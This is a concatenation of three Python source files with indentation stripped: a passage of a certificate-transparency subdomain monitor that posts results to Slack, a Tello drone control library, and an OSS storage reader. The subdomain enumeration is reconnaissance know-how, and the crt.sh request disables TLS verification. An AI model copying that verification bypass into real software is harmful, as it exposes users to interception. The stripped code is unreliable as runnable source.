for result in cursor.fetchall():
matches = re.findall(r"\'(.+?)\'", str(result))
for subdomain in matches:
try:
if get_fld("https://" + subdomain) == domain:
unique_domains.add(subdomain.lower())
except: pass
return sorted(unique_domains)
except:
error = "Unable to connect to the database. We will attempt to use the API instead."
errorlog(error, enable_logging)
except:
base_url = "https://crt.sh/?q={}&output=json"
if wildcard:
domain = "%25.{}".format(domain)
url = base_url.format(domain)
subdomains = set()
user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0'
            req = requests.get(url, headers={'User-Agent': user_agent}, timeout=20, verify=False)  # times out after 20 seconds of waiting
if req.status_code == 200:
try:
content = req.content.decode('utf-8')
data = json.loads(content)
for subdomain in data:
subdomains.add(subdomain["name_value"].lower())
return sorted(subdomains)
except:
error = "Error retrieving information for {}.".format(domain.replace('%25.', ''))
errorlog(error, enable_logging)
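# Illustrative call (kept as a comment because it needs access to the crt.sh
# database or API):
#
#   subdomains = cert_database().lookup("example.com")
#   # -> a sorted list such as ['api.example.com', 'www.example.com', ...]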
def queuing(): #using the queue for multithreading purposes
global domain_to_monitor
global q1
global q2
q1 = queue.Queue(maxsize=0)
q2 = queue.Queue(maxsize=0)
if domain_to_monitor:
pass
elif len(sldb.get_all_domains()) == 0:
print(colored("[!] Please consider adding a list of domains to monitor first.", "red"))
sys.exit(1)
else:
for line in sldb.get_all_domains():
if line != "":
q1.put(line.replace('\n', ''))
q2.put(line.replace('\n', ''))
else:
pass
def adding_new_domain(q1): #adds a new domain to the monitoring list
unique_list = []
global domain_to_monitor
global input
if domain_to_monitor:
if sldb.domain_exists(domain_to_monitor):
print(colored("[!] The domain name {} is already being monitored.".format(domain_to_monitor), "red"))
sys.exit(1)
sldb.add_domain(domain_to_monitor) # Adding new domain for monitoring.
response = cert_database().lookup(domain_to_monitor)
print(colored("\n[+] Adding {} to the monitored list of domains.\n".format(domain_to_monitor), "yellow"))
if response:
            sldb.insert_subdomains(domain_name=domain_to_monitor, subdomains=response)  # saving a copy of the current subdomains retrieved for the new domain
            try: input = raw_input  # make input() behave the same on Python 2.x and 3.x
except NameError: pass
choice = input(colored("[?] Do you wish to list subdomains found for {}? [Y]es [N]o (default: [N]) ".format(domain_to_monitor), "yellow")) #listing subdomains upon request
if choice.upper() == "Y":
for subdomain in response:
unique_list.append(subdomain)
unique_list = list(set(unique_list))
for subdomain in unique_list:
print(colored(subdomain, "yellow"))
else:
sys.exit(1)
else:
print(colored("\n[!] Unfortunately, we couldn't find any subdomain for {}".format(domain_to_monitor), "red"))
    else:  # checks monitored domains that do not have any subdomains stored yet
try:
line = q1.get(timeout=10)
if not sldb.domain_exists(line):
response = cert_database().lookup(line)
if response:
sldb.insert_subdomains(domain_name=line, subdomains=response)
else: pass
else: pass
except queue.Empty:
pass
def check_new_subdomains(q2):  # retrieves the new list of subdomains and stores a temporary text file for comparison purposes
global domain_to_monitor
global domain_to_delete
if domain_to_monitor is None:
if domain_to_delete is None:
try:
line = q2.get(timeout=10)
print("[*] Checking {}".format(line))
with open("./output/" + line.lower() + "_tmp.txt", "a") as subs:
response = cert_database().lookup(line)
if response:
for subdomain in response:
subs.write(subdomain + "\n")
except queue.Empty:
pass
else: pass
def compare_files_diff(domain_to_monitor):  # compares the latest lookup against the previously stored subdomains to find new ones
global enable_logging
if domain_to_monitor is None:
if domain_to_delete is None:
result = []
for domain in sldb.get_all_domains():
subdomains_lookup = cert_database().lookup(domain)
all_subdomains = sldb.get_all_subdomains(domain)
new_subdomains = list(set(subdomains_lookup) - set(all_subdomains))
                result.extend(new_subdomains)
            return result
def dns_resolution(new_subdomains): #Perform DNS resolution on retrieved subdomains
dns_results = {}
subdomains_to_resolve = new_subdomains
print(colored("\n[!] Performing DNS resolution. Please do not interrupt!", "red"))
for domain in subdomains_to_resolve:
domain = domain.replace('+ ','')
domain = domain.replace('*.','')
dns_results[domain] = {}
try:
for qtype in ['A','CNAME']:
dns_output = dns.resolver.query(domain,qtype, raise_on_no_answer = False)
if dns_output.rrset is None:
pass
elif dns_output.rdtype == 1:
a_records = [str(i) for i in dns_output.rrset]
dns_results[domain]["A"] = a_records
elif dns_output.rdtype == 5:
cname_records = [str(i) for i in dns_output.rrset]
dns_results[domain]["CNAME"] = cname_records
else: pass
except dns.resolver.NXDOMAIN:
pass
except dns.resolver.Timeout:
dns_results[domain]["A"] = eval('["Timed out while resolving."]')
dns_results[domain]["CNAME"] = eval('["Timed out error while resolving."]')
pass
except dns.exception.DNSException:
dns_results[domain]["A"] = eval('["There was an error while resolving."]')
dns_results[domain]["CNAME"] = eval('["There was an error while resolving."]')
pass
if dns_results:
        return posting_to_slack(None, True, dns_results)  # Slack new subdomains with DNS output
else:
return posting_to_slack(None, False, None) #Nothing found notification
def at_channel(): #control slack @channel
return("<!channel> " if cfg.slack['at_channel_enabled'] else "")
def posting_to_slack(result, dns_resolve, dns_output): #sending result to slack workplace
global domain_to_monitor
global new_subdomains
if dns_resolve:
dns_result = dns_output
if dns_result:
dns_result = {k:v for k,v in dns_result.items() if v} #filters non-resolving subdomains
rev_url = []
print(colored("\n[!] Exporting result to Slack. Please do not interrupt!", "red"))
unique_list = list(set(new_subdomains) & set(dns_result.keys())) #filters non-resolving subdomains from new_subdomains list
for subdomain in unique_list:
data = "{}:new: {}".format(at_channel(), subdomain)
slack(data)
try:
if dns_result[subdomain]["A"]:
for i in dns_result[subdomain]["A"]:
data = "```A : {}```".format(i)
slack(data)
except: pass
try:
if dns_result[subdomain]['CNAME']:
for i in dns_result[subdomain]['CNAME']:
data = "```CNAME : {}```".format(i)
slack(data)
except: pass
print(colored("\n[!] Done. ", "green"))
for subdomain in unique_list:
sldb.insert_subdomains(get_fld(subdomain, fix_protocol = True), subdomain)
elif len(result) > 0:
rev_url = []
data = ":new:{} New subdomains found!:new: {}\n\n".format(len(result), at_channel())
print(colored("\n[!] Exporting the result to Slack. Please don't interrupt!", "red"))
for url in result:
url = "https://{}\n".format(url.replace('+ ', ''))
data += "{}".format(url)
slack(data)
print(colored("\n[!] Done. ", "green"))
for subdomain in result:
sldb.insert_subdomains(get_fld(subdomain, fix_protocol = True), subdomain)
else:
if not domain_to_monitor:
data = "{}:-1: We couldn't find any new valid subdomains.".format(at_channel())
slack(data)
print(colored("\n[!] Done. ", "green"))
else: pass
def multithreading(threads):
global domain_to_monitor
threads_list = []
if not domain_to_monitor:
num = len(sldb.get_all_domains())
for i in range(max(threads, num)):
if not (q1.empty() and q2.empty()):
t1 = threading.Thread(target = adding_new_domain, args = (q1, ))
#t2 = threading.Thread(target = check_new_subdomains, args = (q2, ))
t1.start()
#t2.start()
threads_list.append(t1)
#threads_list.append(t2)
else:
adding_new_domain(domain_to_monitor)
for t in threads_list:
t.join()
if __name__ == '__main__':
#Setup connection to database
sldb = SLDB(conn_string = cfg.sldb['conn_string'])
#parse arguments
dns_resolve = parse_args().resolve
enable_logging = parse_args().logging
list_domains = parse_args().listing
domain_to_monitor = domain_sanity_check(parse_args().target)
domain_to_delete = domain_sanity_check(parse_args().remove_domain)
do_reset = parse_args().reset
#execute the various functions
banner()
reset(do_reset)
remove_domain(domain_to_delete)
domains_listing()
queuing()
multithreading(parse_args().threads)
new_subdomains = compare_files_diff(domain_to_monitor)
# Check if DNS resolution is checked
if not domain_to_monitor:
if (dns_resolve and len(new_subdomains) > 0):
dns_resolution(new_subdomains)
else:
posting_to_slack(new_subdomains, False, None)
else: pass
#Tear down connection to database
sldb.session.close()
sldb.session.remove()
|
tello.py
|
# coding=utf-8
import logging
import socket
import time
import threading
import cv2 # type: ignore
from threading import Thread
from typing import Optional
from enforce_types import enforce_types
threads_initialized = False
drones: Optional[dict] = {}
client_socket: socket.socket
@enforce_types
class Tello:
"""Python wrapper to interact with the Ryze Tello drone using the official Tello api.
Tello API documentation:
[1.3](https://dl-cdn.ryzerobotics.com/downloads/tello/20180910/Tello%20SDK%20Documentation%20EN_1.3.pdf),
[2.0 with EDU-only commands](https://dl-cdn.ryzerobotics.com/downloads/Tello/Tello%20SDK%202.0%20User%20Guide.pdf)
"""
# Send and receive commands, client socket
RESPONSE_TIMEOUT = 7 # in seconds
TIME_BTW_COMMANDS = 0.1 # in seconds
TIME_BTW_RC_CONTROL_COMMANDS = 0.001 # in seconds
RETRY_COUNT = 3 # number of retries after a failed command
TELLO_IP = '192.168.10.1' # Tello IP address
# Video stream, server socket
VS_UDP_IP = '0.0.0.0'
VS_UDP_PORT = 11111
CONTROL_UDP_PORT = 8889
STATE_UDP_PORT = 8890
# Set up logger
HANDLER = logging.StreamHandler()
FORMATTER = logging.Formatter('[%(levelname)s] %(filename)s - %(lineno)d - %(message)s')
HANDLER.setFormatter(FORMATTER)
LOGGER = logging.getLogger('djitellopy')
LOGGER.addHandler(HANDLER)
LOGGER.setLevel(logging.INFO)
# use Tello.LOGGER.setLevel(logging.<LEVEL>) in YOUR CODE
# to only receive logs of the desired level and higher
# conversion functions for state protocol fields
state_field_converters = {
# Tello EDU with mission pads enabled only
'mid': int,
'x': int,
'y': int,
'z': int,
# 'mpry': (custom format 'x,y,z')
# common entries
'pitch': int,
'roll': int,
'yaw': int,
'vgx': int,
'vgy': int,
'vgz': int,
'templ': int,
'temph': int,
'tof': int,
'h': int,
'bat': int,
'baro': float,
'time': int,
'agx': float,
'agy': float,
'agz': float,
}
# VideoCapture object
cap: Optional[cv2.VideoCapture] = None
background_frame_read: Optional['BackgroundFrameRead'] = None
stream_on = False
is_flying = False
def __init__(self,
host=TELLO_IP,
retry_count=RETRY_COUNT):
global threads_initialized, drones
self.address = (host, Tello.CONTROL_UDP_PORT)
self.stream_on = False
self.retry_count = retry_count
self.last_received_command_timestamp = time.time()
self.last_rc_control_timestamp = time.time()
if not threads_initialized:
# Run Tello command responses UDP receiver on background
response_receiver_thread = threading.Thread(target=Tello.udp_response_receiver)
response_receiver_thread.daemon = True
response_receiver_thread.start()
# Run state UDP receiver on background
state_receiver_thread = threading.Thread(target=Tello.udp_state_receiver)
state_receiver_thread.daemon = True
state_receiver_thread.start()
threads_initialized = True
drones[host] = {
'responses': [],
'state': {},
}
def get_own_udp_object(self):
global drones
host = self.address[0]
return drones[host]
@staticmethod
def udp_response_receiver():
"""Setup drone UDP receiver. This method listens for responses of Tello.
Must be run from a background thread in order to not block the main thread.
Internal method, you normally wouldn't call this yourself.
"""
global client_socket
client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client_socket.bind(('', Tello.CONTROL_UDP_PORT))
while True:
try:
data, address = client_socket.recvfrom(1024)
address = address[0]
Tello.LOGGER.debug('Data received from {} at client_socket'.format(address))
if address not in drones:
continue
drones[address]['responses'].append(data)
except Exception as e:
Tello.LOGGER.error(e)
break
@staticmethod
def udp_state_receiver():
"""Setup state UDP receiver. This method listens for state information from
Tello. Must be run from a background thread in order to not block
the main thread.
Internal method, you normally wouldn't call this yourself.
"""
state_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
state_socket.bind(('', Tello.STATE_UDP_PORT))
while True:
try:
data, address = state_socket.recvfrom(1024)
address = address[0]
Tello.LOGGER.debug('Data received from {} at state_socket'.format(address))
if address not in drones:
continue
data = data.decode('ASCII')
drones[address]['state'] = Tello.parse_state(data)
except Exception as e:
Tello.LOGGER.error(e)
break
@staticmethod
def parse_state(state: str) -> dict:
"""Parse a state line to a dictionary
Internal method, you normally wouldn't call this yourself.
"""
state = state.strip()
Tello.LOGGER.debug('Raw state data: {}'.format(state))
if state == 'ok':
return {}
state_dict = {}
for field in state.split(';'):
split = field.split(':')
if len(split) < 2:
continue
key = split[0]
value = split[1]
if key in Tello.state_field_converters:
try:
value = Tello.state_field_converters[key](value)
except Exception as e:
Tello.LOGGER.debug('Error parsing state value for {}: {} to {}'
.format(key, value, Tello.state_field_converters[key]))
Tello.LOGGER.error(e)
state_dict[key] = value
return state_dict
def get_current_state(self) -> dict:
"""Call this function to attain the state of the Tello. Returns a dict
with all fields.
Internal method, you normally wouldn't call this yourself.
"""
return self.get_own_udp_object()['state']
def get_state_field(self, key: str):
"""Get a specific sate field by name.
Internal method, you normally wouldn't call this yourself.
"""
state = self.get_current_state()
if key in state:
return state[key]
else:
raise Exception('Could not get state property ' + key)
def get_mission_pad_id(self) -> int:
"""Mission pad ID of the currently detected mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: -1 if none is detected, else 1-8
"""
return self.get_state_field('mid')
def get_mission_pad_distance_x(self) -> int:
"""X distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('x')
def get_mission_pad_distance_y(self) -> int:
"""Y distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('y')
def get_mission_pad_distance_z(self) -> int:
"""Z distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('z')
def get_pitch(self) -> int:
"""Get pitch in degree
Returns:
int: pitch in degree
"""
return self.get_state_field('pitch')
def get_roll(self) -> int:
"""Get roll in degree
Returns:
int: roll in degree
"""
return self.get_state_field('roll')
def get_yaw(self) -> int:
"""Get yaw in degree
Returns:
int: yaw in degree
"""
return self.get_state_field('yaw')
def get_speed_x(self) -> int:
"""X-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgx')
def get_speed_y(self) -> int:
"""Y-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgy')
def get_speed_z(self) -> int:
"""Z-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgz')
def get_acceleration_x(self) -> float:
"""X-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agx')
def get_acceleration_y(self) -> float:
"""Y-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agy')
def get_acceleration_z(self) -> float:
"""Z-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agz')
def get_lowest_temperature(self) -> int:
"""Get lowest temperature
Returns:
int: lowest temperature (°C)
"""
return self.get_state_field('templ')
def get_highest_temperature(self) -> int:
"""Get highest temperature
Returns:
            int: highest temperature (°C)
"""
return self.get_state_field('temph')
def get_temperature(self) -> float:
"""Get average temperature
Returns:
float: average temperature (°C)
"""
templ = self.get_lowest_temperature()
temph = self.get_highest_temperature()
return (templ + temph) / 2
def get_height(self) -> int:
"""Get current height in cm
Returns:
int: height in cm
"""
return self.get_state_field('h')
def get_distance_tof(self) -> int:
"""Get current distance value from TOF in cm
Returns:
int: TOF distance in cm
"""
return self.get_state_field('tof')
def get_barometer(self) -> int:
"""Get current barometer measurement in cm
This resembles the absolute height.
See https://en.wikipedia.org/wiki/Altimeter
Returns:
int: barometer measurement in cm
"""
return self.get_state_field('baro') * 100
def get_flight_time(self) -> int:
"""Get the time the motors have been active in seconds
Returns:
int: flight time in s
"""
return self.get_state_field('time')
def get_battery(self) -> int:
"""Get current battery percentage
Returns:
int: 0-100
"""
return self.get_state_field('bat')
def get_udp_video_address(self) -> str:
"""Internal method, you normally wouldn't call this youself.
"""
return 'udp://@' + self.VS_UDP_IP + ':' + str(self.VS_UDP_PORT) # + '?overrun_nonfatal=1&fifo_size=5000'
def get_video_capture(self):
"""Get the VideoCapture object from the camera drone.
Users usually want to use get_frame_read instead.
Returns:
VideoCapture
"""
if self.cap is None:
self.cap = cv2.VideoCapture(self.get_udp_video_address())
if not self.cap.isOpened():
self.cap.open(self.get_udp_video_address())
return self.cap
def get_frame_read(self) -> 'BackgroundFrameRead':
"""Get the BackgroundFrameRead object from the camera drone. Then, you just need to call
backgroundFrameRead.frame to get the actual frame received by the drone.
Returns:
BackgroundFrameRead
"""
if self.background_frame_read is None:
self.background_frame_read = BackgroundFrameRead(self, self.get_udp_video_address()).start()
return self.background_frame_read
def stop_video_capture(self):
return self.streamoff()
def send_command_with_return(self, command: str, timeout: int = RESPONSE_TIMEOUT) -> str:
"""Send command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
Return:
            bool/str: str with response text on success, False when unsuccessful.
"""
        # Commands sent in quick succession are ignored by the drone, so wait at least self.TIME_BTW_COMMANDS seconds between commands
diff = time.time() - self.last_received_command_timestamp
if diff < self.TIME_BTW_COMMANDS:
self.LOGGER.debug('Waiting {} seconds to execute command {}...'.format(diff, command))
time.sleep(diff)
self.LOGGER.info('Send command: ' + command)
timestamp = time.time()
client_socket.sendto(command.encode('utf-8'), self.address)
responses = self.get_own_udp_object()['responses']
while len(responses) == 0:
if time.time() - timestamp > timeout:
self.LOGGER.warning('Timeout exceed on command ' + command)
return "Timeout error!"
else:
time.sleep(0.1)
self.last_received_command_timestamp = time.time()
response = responses.pop(0)
response = response.decode('utf-8').rstrip("\r\n")
self.LOGGER.info('Response {}: {}'.format(command, response))
return response
def send_command_without_return(self, command: str):
"""Send command to Tello without expecting a response.
Internal method, you normally wouldn't call this yourself.
"""
self.LOGGER.info('Send command (no expect response): ' + command)
client_socket.sendto(command.encode('utf-8'), self.address)
def send_control_command(self, command: str, timeout: int = RESPONSE_TIMEOUT) -> bool:
"""Send control command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
"""
response = "max retries exceeded"
for i in range(0, self.retry_count):
response = self.send_command_with_return(command, timeout=timeout)
if response == 'OK' or response == 'ok':
return True
self.LOGGER.debug('Command attempt {} for {} failed'.format(i, command))
self.raise_result_error(command, response)
return False # never reached
def send_read_command(self, command: str) -> str:
"""Send given command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_command_with_return(command)
try:
response = str(response)
except TypeError as e:
self.LOGGER.error(e)
pass
if ('error' not in response) and ('ERROR' not in response) and ('False' not in response):
return response
if response.isdigit():
return int(response)
else:
try:
return float(response) # isdigit() is False when the number is a float(barometer)
except ValueError:
return response
else:
self.raise_result_error(command, response)
return "error: this code should never be reached"
def send_read_command_int(self, command: str) -> int:
"""Send given command to Tello and wait for its response.
Parses the response to an integer
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_read_command(command)
return int(response)
def send_read_command_float(self, command: str) -> float:
"""Send given command to Tello and wait for its response.
Parses the response to an integer
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_read_command(command)
return float(response)
def raise_result_error(self, command: str, response: str) -> bool:
raise Exception('Command {} was unsuccessful. Message: {}'.format(command, response))
def connect(self):
"""Enter SDK mode. Call this before any of the control functions.
"""
self.send_control_command("command")
def takeoff(self):
"""Automatic takeoff
"""
        # Sometimes the drone takes quite a while to take off and to report a successful takeoff.
        # So we wait longer here; otherwise the following calls may fail.
self.send_control_command("takeoff", timeout=20)
self.is_flying = True
def land(self):
"""Automatic land
"""
self.send_control_command("land")
self.is_flying = False
def streamon(self):
"""Turn on video streaming. Use `tello.get_frame_read` afterwards.
Video Streaming is supported on all tellos when in AP mode (i.e.
        when your computer is connected to the Tello-XXXXXX WiFi network).
Currently Tello EDUs do not support video streaming while connected
to a wifi network.
!!! note
If the response is 'Unknown command' you have to update the Tello
firmware. This can be done using the official Tello app.
"""
self.send_control_command("streamon")
self.stream_on = True
def streamoff(self):
"""Turn off video streaming.
"""
self.send_control_command("streamoff")
self.stream_on = False
def emergency(self):
"""Stop all motors immediately.
"""
self.send_control_command("emergency")
def move(self, direction: str, x: int):
"""Tello fly up, down, left, right, forward or back with distance x cm.
Users would normally call one of the move_x functions instead.
Arguments:
direction: up, down, left, right, forward or back
x: 20-500
"""
self.send_control_command(direction + ' ' + str(x))
def move_up(self, x: int):
"""Fly x cm up.
Arguments:
x: 20-500
"""
self.move("up", x)
def move_down(self, x: int):
"""Fly x cm down.
Arguments:
x: 20-500
"""
self.move("down", x)
def move_left(self, x: int):
"""Fly x cm left.
Arguments:
x: 20-500
"""
self.move("left", x)
def move_right(self, x: int):
"""Fly x cm right.
Arguments:
x: 20-500
"""
self.move("right", x)
def move_forward(self, x: int):
"""Fly x cm forward.
Arguments:
x: 20-500
"""
self.move("forward", x)
def move_back(self, x: int):
"""Fly x cm backwards.
Arguments:
x: 20-500
"""
self.move("back", x)
def rotate_clockwise(self, x: int):
"""Rotate x degree clockwise.
Arguments:
x: 1-360
"""
self.send_control_command("cw " + str(x))
def rotate_counter_clockwise(self, x: int):
"""Rotate x degree counter-clockwise.
Arguments:
            x: 1-360
"""
self.send_control_command("ccw " + str(x))
def flip(self, direction: str):
"""Do a flip maneuver.
Users would normally call one of the flip_x functions instead.
Arguments:
direction: l (left), r (right), f (forward) or b (back)
"""
self.send_control_command("flip " + direction)
def flip_left(self):
"""Flip to the left.
"""
self.flip("l")
def flip_right(self):
"""Flip to the right.
"""
self.flip("r")
def flip_forward(self):
"""Flip forward.
"""
self.flip("f")
def flip_back(self):
"""Flip backwards.
"""
self.flip("b")
def go_xyz_speed(self, x: int, y: int, z: int, speed: int):
"""Fly to x y z relative to the current position.
Speed defines the traveling speed in cm/s.
Arguments:
x: 20-500
y: 20-500
z: 20-500
speed: 10-100
"""
self.send_control_command('go %s %s %s %s' % (x, y, z, speed))
def curve_xyz_speed(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int):
"""Fly to x2 y2 z2 in a curve via x2 y2 z2. Speed defines the traveling speed in cm/s.
- Both points are relative to the current position
- The current position and both points must form a circle arc.
- If the arc radius is not within the range of 0.5-10 meters, it raises an Exception
- x1/x2, y1/y2, z1/z2 can't both be between -20-20 at the same time, but can both be 0.
Arguments:
x1: -500-500
x2: -500-500
y1: -500-500
y2: -500-500
z1: -500-500
z2: -500-500
speed: 10-60
"""
self.send_control_command('curve %s %s %s %s %s %s %s' % (x1, y1, z1, x2, y2, z2, speed))
def go_xyz_speed_mid(self, x: int, y: int, z: int, speed: int, mid: int):
"""Fly to x y z relative to the mission pad with id mid.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
mid: 1-8
"""
self.send_control_command('go %s %s %s %s m%s' % (x, y, z, speed, mid))
def curve_xyz_speed_mid(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int, mid: int):
"""Fly to x2 y2 z2 in a curve via x2 y2 z2. Speed defines the traveling speed in cm/s.
- Both points are relative to the mission pad with id mid.
- The current position and both points must form a circle arc.
- If the arc radius is not within the range of 0.5-10 meters, it raises an Exception
- x1/x2, y1/y2, z1/z2 can't both be between -20-20 at the same time, but can both be 0.
Arguments:
x1: -500-500
y1: -500-500
z1: -500-500
x2: -500-500
y2: -500-500
z2: -500-500
speed: 10-60
mid: 1-8
"""
self.send_control_command('curve %s %s %s %s %s %s %s m%s' % (x1, y1, z1, x2, y2, z2, speed, mid))
def go_xyz_speed_yaw_mid(self, x: int, y: int, z: int, speed: int, yaw: int, mid1: int, mid2: int):
"""Fly to x y z relative to mid1.
Then fly to 0 0 z over mid2 and rotate to yaw relative to mid2's rotation.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
yaw: -360-360
mid1: 1-8
mid2: 1-8
"""
self.send_control_command('jump %s %s %s %s %s m%s m%s' % (x, y, z, speed, yaw, mid1, mid2))
def enable_mission_pads(self):
"""Enable mission pad detection
"""
self.send_control_command("mon")
def disable_mission_pads(self):
"""Disable mission pad detection
"""
self.send_control_command("moff")
def set_mission_pad_detection_direction(self, x):
"""Set mission pad detection direction. enable_mission_pads needs to be
called first. When detecting both directions detecting frequency is 10Hz,
otherwise the detection frequency is 20Hz.
Arguments:
x: 0 downwards only, 1 forwards only, 2 both directions
"""
self.send_control_command("mdirection " + str(x))
def set_speed(self, x: int):
"""Set speed to x cm/s.
Arguments:
x: 10-100
"""
self.send_control_command("speed " + str(x))
def send_rc_control(self, left_right_velocity: int, forward_backward_velocity: int, up_down_velocity: int,
yaw_velocity: int):
"""Send RC control via four channels. Command is sent every self.TIME_BTW_RC_CONTROL_COMMANDS seconds.
Arguments:
left_right_velocity: -100~100 (left/right)
forward_backward_velocity: -100~100 (forward/backward)
up_down_velocity: -100~100 (up/down)
yaw_velocity: -100~100 (yaw)
"""
def round_to_100(x: int):
if x > 100:
return 100
if x < -100:
return -100
return x
if time.time() - self.last_rc_control_timestamp > self.TIME_BTW_RC_CONTROL_COMMANDS:
self.last_rc_control_timestamp = time.time()
self.send_command_without_return('rc %s %s %s %s' % (round_to_100(left_right_velocity),
round_to_100(forward_backward_velocity),
round_to_100(up_down_velocity),
round_to_100(yaw_velocity)))
def set_wifi_credentials(self, ssid, password):
"""Set the Wi-Fi SSID and password. The Tello will reboot afterwords.
"""
self.send_command_without_return('wifi %s %s' % (ssid, password))
def connect_to_wifi(self, ssid, password):
"""Connects to the Wi-Fi with SSID and password.
After this command the tello will reboot.
Only works with Tello EDUs.
"""
self.send_command_without_return('ap %s %s' % (ssid, password))
def query_speed(self) -> int:
"""Query speed setting (cm/s)
Returns:
int: 1-100
"""
return self.send_read_command_int('speed?')
def query_battery(self) -> int:
"""Get current battery percentage via a query command
Using get_battery is usually faster
Returns:
int: 0-100 in %
"""
return self.send_read_command_int('battery?')
def query_flight_time(self) -> int:
"""Query current fly time (s).
Using get_flight_time is usually faster.
Returns:
int: Seconds elapsed during flight.
"""
return self.send_read_command_int('time?')
def query_height(self) -> int:
"""Get height in cm via a query command.
Using get_height is usually faster
Returns:
int: 0-3000
"""
return self.send_read_command_int('height?')
def query_temperature(self) -> int:
"""Query temperature (°C).
Using get_temperature is usually faster.
Returns:
int: 0-90
"""
return self.send_read_command_int('temp?')
def query_attitude(self) -> dict:
"""Query IMU attitude data.
Using get_pitch, get_roll and get_yaw is usually faster.
Returns:
{'pitch': int, 'roll': int, 'yaw': int}
"""
response = self.send_read_command('attitude?')
return Tello.parse_state(response)
def query_barometer(self) -> int:
"""Get barometer value (cm)
Using get_barometer is usually faster.
Returns:
int: 0-100
"""
return self.send_read_command_int('baro?') * 100
def query_distance_tof(self) -> float:
"""Get distance value from TOF (cm)
Using get_distance_tof is usually faster.
Returns:
float: 30-1000
"""
# example response: 801mm
return int(self.send_read_command('tof?')[:-2]) / 10
def query_wifi_signal_noise_ratio(self) -> str:
"""Get Wi-Fi SNR
Returns:
str: snr
"""
return self.send_read_command('wifi?')
def query_sdk_version(self) -> str:
"""Get SDK Version
Returns:
str: SDK Version
"""
return self.send_read_command('sdk?')
def query_serial_number(self) -> str:
"""Get Serial Number
Returns:
str: Serial Number
"""
return self.send_read_command('sn?')
def end(self):
"""Call this method when you want to end the tello object
"""
if self.is_flying:
self.land()
if self.stream_on:
self.streamoff()
if self.background_frame_read is not None:
self.background_frame_read.stop()
if self.cap is not None:
self.cap.release()
host = self.address[0]
if host in drones:
del drones[host]
def __del__(self):
self.end()
class BackgroundFrameRead:
"""
    This class reads frames from a VideoCapture in the background. Use
    backgroundFrameRead.frame to get the current frame.
"""
def __init__(self, tello, address):
tello.cap = cv2.VideoCapture(address)
self.cap = tello.cap
if not self.cap.isOpened():
self.cap.open(address)
self.grabbed, self.frame = self.cap.read()
self.stopped = False
def start(self):
Thread(target=self.update_frame, args=(), daemon=True).start()
return self
def update_frame(self):
while not self.stopped:
if not self.grabbed or not self.cap.isOpened():
self.stop()
else:
(self.grabbed, self.frame) = self.cap.read()
def stop(self):
self.stopped = True
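if __name__ == "__main__":
    # Offline usage sketch (not part of the original module): Tello.parse_state is
    # a pure function, so it can be exercised without a drone. The state string
    # below is a made-up sample in the format broadcast on UDP port 8890.
    sample = ("pitch:0;roll:1;yaw:-10;vgx:0;vgy:0;vgz:0;templ:60;temph:62;"
              "tof:10;h:0;bat:87;baro:123.45;time:0;agx:-5.00;agy:0.00;agz:-999.00;")
    print(Tello.parse_state(sample))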
|
ioutil.py
|
import os
import io
import json
import oss2
import cv2
import configparser
import enum
import numpy as np
from PIL import Image
from typing import Any, Union, Dict, List, Tuple
from multiprocessing import Queue, Process, Pool
from loguru import logger
class StoreType(enum.Enum):
def __new__(cls, *args, **kwargs):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __init__(self, type_name: str):
self.type_name = type_name
LOCAL = "local"
OSS = "oss"
class DataType(enum.Enum):
def __new__(cls, *args, **kwargs):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __init__(self, type_name: str):
self.type_name = type_name
BYTES = "bytes"
IMAGE = "image"
NUMPY = "numpy"
JSON = "json"
# do nothing, just return input
DUMMY = "dummy"
def read_oss_config(path: str) -> Dict[str, Any]:
oss_src_config = configparser.ConfigParser()
oss_src_config.read(os.path.expanduser(path))
return oss_src_config['Credentials']
def create_oss_bucket(oss_config: Union[Dict[str, str], str]) -> oss2.Bucket:
if isinstance(oss_config, str):
oss_config = read_oss_config(oss_config)
auth = oss2.Auth(oss_config['accessKeyID'], oss_config['accessKeySecret'])
return oss2.Bucket(auth, endpoint=oss_config['endpoint'], bucket_name=oss_config['bucket'])
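# The OSS config file read above is a plain INI file; judging from the keys used
# in create_oss_bucket it is expected to look roughly like this (placeholders):
#
#   [Credentials]
#   accessKeyID = <your-access-key-id>
#   accessKeySecret = <your-access-key-secret>
#   endpoint = <oss-endpoint-url>
#   bucket = <bucket-name>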
class Reader(object):
def read(self, path):
raise NotImplementedError
def oss_read(bucket, key, oss_root=None):
path = os.path.join(oss_root, key) if oss_root else key
data_bytes = bucket.get_object(path).read()
return data_bytes
class OssReader(Reader):
def __init__(self, oss_config: str):
self.bucket = create_oss_bucket(oss_config)
def read(self, path):
return oss_read(self.bucket, path)
class LocalReader(Reader):
def read(self, path):
        with open(path, 'rb') as f:
            return f.read()
class DummyReader(Reader):
def __init__(self, reader: Reader):
self.reader = reader
def read(self, path):
return path
class BytesReader(Reader):
def __init__(self, reader: Reader):
self.reader = reader
def read(self, path):
return self.reader.read(path)
